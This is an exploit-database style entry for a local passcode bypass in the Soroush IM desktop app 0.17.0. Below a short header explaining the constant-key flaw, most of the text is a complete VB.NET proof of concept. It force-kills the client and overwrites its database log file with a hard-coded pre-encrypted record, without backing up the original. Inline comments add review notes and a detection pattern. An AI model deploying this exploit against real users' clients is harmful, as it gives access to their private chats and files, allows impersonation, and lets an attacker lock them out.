soroush im desktop app 0.17.0 authentication bypass
# Exploit Title: Soroush IM Desktop App 0.17.0 - Authentication Bypass
# Date: 2018-08-08
# Exploit Author: VortexNeoX64
# Vendor Homepage: https://soroush-app.ir
# Software Link: http://54.36.43.176/SoroushSetup0.17.0.exe
# Version: 0.17.0 BETA
# Tested on: Windows 10 1803 and Windows Server 2016 14393
# Security Issue:
# It seems that all databases are encrypted with a constant key, so the same data produces the same output
# on every PC. Pushing NO_PASSCODE data that was encrypted beforehand into the database
# on any other PC is therefore accepted as valid and removes the passcode. Database entries are first
# written to a log file in the same folder as the database, and the Soroush app then pushes the log file
# into the permanent database. An attacker can unlock the client app through this database injection and bypass the
# authentication process. Because the injection needs write access to the user's profile folder, the passcode
# only stops someone who cannot already modify that user's files.
# This exploit leads to two important security risks:
# 1. The attacker can access all the data, chats, images, files, etc., and is then able to send and receive data on behalf of the original user.
# 2. The attacker may then use the exploit to perform a DoS attack,
# which is done by setting a new passcode for the client without knowing the previous passcode
# PoC (.NET 4.0 Visual Basic)
# PoC does not support Windows XP, try changing "\users\" to "\Documents and Settings\"

' Proof of concept for the passcode bypass described in the header above.
' It stops the Soroush client, builds a replacement for the client's database
' log file from a fixed byte array, and overwrites the first ".log" file found
' in the client's data directory with it.
' NOTE(review): every file operation below runs with the rights of the user who
' starts the program and only touches that user's profile, so the issue is a
' missing integrity/ownership check on local state rather than a remote flaw.
Module Module1
    Sub Main()
        ' Banner output only; the strings are printed as the author wrote them.
        Console.WriteLine("*** [Souroush IM Local Passcode bypass via database injection] ***")
        Console.WriteLine("*** [Developed by [VortexNeoX64] 2018] ***")
        Console.WriteLine("** [Tested on Windows 10 1803 and windows server 2016 14393 , Soroush version = 0.17.0 BETA] **")
        Console.WriteLine("** [Affected systems: probebly Linux, MacOS and for sure Windows] **")
        Console.WriteLine("** [Vulnerability type: Local & Privilege Escalation [Passcode bypass] ]**")
        Console.WriteLine()
        Console.WriteLine("Press any Key to exploit...")
        ' Nothing is changed on disk until a key is pressed.
        Console.ReadKey()
        ' Fixed content of the replacement log file. The bytes decode to a short
        ' binary prefix, a Base64 string, and a JSON object of the form
        ' {"data":"<Base64>","type":"primitive"}. According to the header this is
        ' the already-encrypted NO_PASSCODE record; that the client accepts it on
        ' other machines is the author's observation (attributed to a constant
        ' key) and cannot be confirmed from this listing alone.
        Dim _temp As Byte() = {
            237, 4, 235, 105, 158, 3, 1, 16, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 88, 97, 81, 122, 79, 114, 86, 89, 53, 79, 111, 73, 79, 77, 90, 49, 52, 102, 83, 101, 122, 80, 113, 121, 122, 88, 49, 70, 65, 108, 56, 52, 116, 112, 87, 75, 77, 117, 115, 122, 117, 109, 72, 101, 116, 51, 43, 54, 122, 106, 55, 117, 108, 74, 66, 47, 99, 107, 110, 87, 113, 107, 84, 111, 74, 66, 52, 118, 53, 74, 120, 75, 47, 114, 122, 57, 122, 73, 53, 116, 43, 76, 122, 68, 116, 86, 81, 61, 61, 182, 6, 123, 34, 100, 97, 116, 97, 34, 58, 34, 57, 105, 105, 116, 76, 114, 118, 88, 76, 98, 99, 66, 67, 74, 52, 87, 102, 68, 55, 106, 66, 82, 72, 109, 110, 113, 66, 57, 110, 82, 85, 90, 81, 54, 85, 49, 113, 78, 120, 75, 55, 57, 98, 106, 85, 106, 109, 74, 102, 122, 105, 67, 111, 65, 100, 114, 99, 98, 82, 119, 54, 43, 75, 68, 72, 47, 108, 85, 82, 90, 77, 119, 73, 103, 70, 113, 57, 75, 57, 112, 115, 57, 97, 49, 69, 47, 77, 104, 73, 51, 51, 114, 80, 83, 81, 113, 99, 117, 49, 89, 87, 101, 49, 83, 75, 98, 103, 78, 84, 72, 113, 89, 82, 87, 71, 73, 43, 88, 111, 85, 105, 69, 55, 72, 120, 121, 120, 57, 50, 90, 116, 116, 43, 81, 75, 100, 103, 114, 67, 77, 120, 122, 65, 66, 66, 50, 117, 85, 87, 68, 119, 67, 113, 68, 105, 53, 67, 111, 86,
            69, 108, 77, 43, 113, 90, 106, 118, 75, 100, 66, 99, 112, 120, 99, 47, 110, 80, 84, 67, 55, 117, 111, 116, 86, 115, 89, 50, 89, 55, 88, 89, 49, 88, 52, 78, 69, 52, 100, 105, 110, 71, 120, 67, 87, 118, 118, 73, 106, 107, 80, 51, 85, 114, 75, 48, 51, 100, 67, 114, 71, 85, 75, 119, 98, 70, 48, 85, 101, 73, 50, 77, 108, 97, 84, 67, 100, 49, 97, 77, 43, 119, 83, 80, 111, 99, 110, 105, 66, 97, 67, 48, 52, 56, 82, 83, 110, 97, 120, 75, 56, 88, 55, 84, 89, 83, 111, 65, 111, 115, 98, 117, 78, 80, 66, 110, 103, 72, 52, 110, 68, 97, 112, 74, 84, 104, 108, 120, 104, 85, 78, 117, 70, 103, 57, 48, 98, 65, 87, 100, 83, 111, 75, 105, 69, 65, 56, 69, 106, 105, 52, 120, 69, 111, 97, 49, 70, 109, 73, 49, 69, 83, 110, 67, 66, 117, 114, 76, 111, 70, 75, 53, 73, 111, 81, 49, 74, 115, 79, 105, 74, 108, 119, 51, 89, 116, 69, 70, 71, 121, 121, 102, 76, 110, 85, 73, 121, 56, 49, 54, 85, 71, 80, 87, 69, 53, 79, 90, 53, 74, 72, 50, 66, 117, 84, 47, 79, 90, 65, 77, 111, 57, 88, 115, 88, 68, 105, 77, 121, 108, 111, 66, 105, 105, 75, 81, 49, 56, 117, 50, 85, 104, 78, 109, 97, 119, 79, 67, 74, 78, 120, 53, 108, 51, 118, 48, 68, 104, 84, 51, 76, 75, 106, 69, 103, 55, 86, 84, 115, 79, 80, 65, 121, 118, 54, 90, 90, 83, 118, 82, 51, 67, 118, 109, 66, 86, 57, 108, 52, 114, 70, 120, 71, 50, 52, 108, 113, 66, 70, 70, 101, 115, 105, 120, 88, 102, 74, 122, 108, 90, 69, 111, 68, 120, 80, 115, 70, 109, 116, 88, 67, 65, 110, 65, 86, 106, 70, 74, 54, 49, 80, 67, 104, 104, 84, 120, 67, 116, 115, 82, 73, 108, 78, 77, 109, 90, 122, 77, 90, 80, 73, 99, 80, 104, 115, 68, 83, 80, 80, 72, 76, 98, 49, 56, 56, 67, 84, 80, 80, 47, 116, 85, 48, 72, 122, 116, 101, 83, 105, 68, 47, 66, 97, 84, 107, 50, 104, 102, 121, 82, 66, 114, 72, 78, 75, 56, 118, 89, 101, 122, 122, 82, 117, 85, 102, 43, 78, 111, 111, 79, 43, 90, 73, 51, 69, 71, 90, 52, 69, 57, 48, 75, 101, 80, 82, 52, 48, 122, 76, 49, 118, 116, 68, 65, 78, 98, 80, 47, 109, 57, 122, 53, 87, 83, 105, 113, 118, 110, 47, 111, 66, 69, 78, 51, 100, 67, 72, 106, 120, 80, 81,
            55, 119, 54, 78, 68, 120, 108, 86, 108, 83, 117, 119, 113, 120, 78, 87, 47, 86, 102, 117, 65, 74, 77, 84, 84, 121, 103, 73, 80, 89, 87, 73, 117, 85, 111, 101, 54, 118, 106, 71, 83, 69, 118, 101, 78, 80, 72, 121, 99, 99, 88, 122, 90, 76, 122, 71, 90, 102, 66, 85, 87, 81, 101, 75, 74, 99, 86, 68, 80, 103, 109, 43, 88, 66, 80, 73, 56, 47, 101, 107, 111, 101, 71, 104, 108, 97, 107, 70, 75, 85, 112, 112, 57, 75, 99, 102, 111, 111, 97, 75, 51, 56, 48, 121, 78, 115, 87, 118, 52, 119, 88, 51, 65, 116, 51, 118, 111, 114, 74, 81, 101, 119, 117, 89, 97, 76, 78, 114, 116, 52, 68, 121, 122, 90, 107, 52, 98, 117, 68, 110, 87, 119, 85, 48, 97, 122, 109, 104, 71, 111, 69, 119, 88, 66, 78, 108, 81, 79, 89, 54, 49, 117, 66, 103, 78, 110, 78, 103, 82, 65, 61, 61, 34, 44, 34, 116, 121, 112, 101, 34, 58, 34, 112, 114, 105, 109, 105, 116, 105, 118, 101, 34, 125}
        Try
            Console.WriteLine("Killing the app...")
            ' Forced (/f) termination of soroush.exe and its child processes (/t),
            ' run hidden; the final True makes Shell wait until taskkill has exited.
            ' For defenders: a forced kill of the client followed directly by a write
            ' into its data directory is the observable pattern of this PoC.
            Shell("Taskkill /im soroush.exe /f /t ", AppWinStyle.Hide, True)
            Console.WriteLine("Making malicious database...")
            Dim target As String = ""
            Dim targetname As String = ""
            ' index is assigned in the loop below but never read afterwards.
            Dim index As Integer = 0
            Dim _info As IO.FileInfo()
            ' Data directory of the client: the first character of the System folder
            ' path is used as the drive letter, followed by the current user's roaming
            ' profile and a fixed sub-directory.
            ' NOTE(review): the 40-hex-character directory name is hard-coded; whether
            ' it is identical on every installation is not shown here.
            Dim _Dirinfo As New IO.DirectoryInfo(Environment.GetFolderPath(Environment.SpecialFolder.System).Substring(0, 1) & ":\Users\" & Environment.UserName & "\AppData\Roaming\Soroush\Data\73b880c1b168541ab6e01acc2f7bf46f06379320\")
            ' Stage the replacement content as log.log in the current directory.
            IO.File.WriteAllBytes(Environment.CurrentDirectory & "\log.log", _temp)
            Console.WriteLine("Getting orginal database name....")
            _info = _Dirinfo.GetFiles()
            ' Take the first file with a ".log" extension; the header describes this
            ' as the log that the client later pushes into its permanent database.
            For i = 0 To _info.Count - 1
                If _info(i).Extension = ".log" Then
                    target = _info(i).FullName
                    targetname = _info(i).Name
                    index = i
                    Exit For
                End If
            Next
            ' If no ".log" file was found, target and targetname are still empty
            ' here; the file calls below are then expected to throw and end up in
            ' the Catch block (not verified).
            Console.WriteLine("Target file is : [" & target & "]")
            Console.WriteLine("Renaming malicious database to [" & targetname & "]")
            ' Give the staged file the same name as the client's log file.
            IO.File.Move(Environment.CurrentDirectory & "\log.log", Environment.CurrentDirectory & "\" & targetname)
            Console.WriteLine("injecting database [" & target & "]")
            ' 1.5 s pause before touching the target; presumably to let the killed
            ' process release its file handles - the source does not say.
            Threading.Thread.Sleep(1500)
            ' Replace the client's log file with the staged copy. No backup of the
            ' original file is made.
            IO.File.Delete(target)
            IO.File.Copy(Environment.CurrentDirectory & "\" & targetname, target)
            Console.WriteLine("Done!")
        Catch ex As Exception
            ' Any failure (missing directory, locked file, ...) is only reported.
            Console.WriteLine(ex.Message)
            Beep()
        Finally
            ' Keep the console window open until a key is pressed.
            Console.ReadKey()
        End Try
    End Sub
End Module